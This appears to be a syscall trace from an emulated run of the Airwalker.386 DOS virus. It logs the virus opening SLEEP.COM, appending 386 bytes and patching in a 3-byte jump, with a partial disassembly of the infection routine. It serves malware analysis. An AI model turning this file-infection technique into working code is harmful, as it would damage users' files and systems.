.
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-17T22:19:44.534144889Z | 26 | PC: 12ab3 | Set disk transfer address |
| 2018-12-17T22:19:44.536643995Z | 78 | PC: 12abf | Find first file |
| 2018-12-17T22:19:44.542545276Z | 61 | PC: 12afe | Open file (Filename = 'SLEEP.COM') |
| 2018-12-17T22:19:44.548840752Z | 63 | PC: 12b0c | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-17T22:19:44.555234879Z | 66 | PC: 12b1f | Move file pointer |
| 2018-12-17T22:19:44.55680089Z | 44 | PC: 12b2c | Get time 0x12b2c: xchg cl, ch 0x12b2e: add dx, cx 0x12b30: mov word ptr [bp + 0x172], dx 0x12b34: xor word ptr [bp + 0x15d], 0x1717 0x12b3a: xor byte ptr [bp + 0x15f], 0x19 0x12b3f: mov ah, 0x40 0x12b41: mov cx, 0x182 0x12b44: lea dx, word ptr [bp] 0x12b47: pushaw 0x12b48: jmp 0x12bfa 0x12b4b: pop ax 0x12b4c: jb 0x12b77 0x12b4e: sub ax, 3 0x12b51: push bx 0x12b52: mov bx, bp 0x12b54: mov word ptr cs:[bx + 1], ax 0x12b58: mov byte ptr [bx], 0xe9 0x12b5b: pop bx 0x12b5c: mov ax, 0x4200 0x12b5f: xor cx, cx |
| 2018-12-17T22:19:44.55912979Z | 64 | PC: 12c00 | Write file or device (Write 386 bytes on handle 5) |
| 2018-12-17T22:19:44.572531408Z | 66 | PC: 12b64 | Move file pointer |
| 2018-12-17T22:19:44.573835903Z | 64 | PC: 12b71 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-17T22:19:44.580040616Z | 62 | PC: 12b77 | Close file |
| 2018-12-17T22:19:44.5878074Z | 9 | PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.386 virus! ') |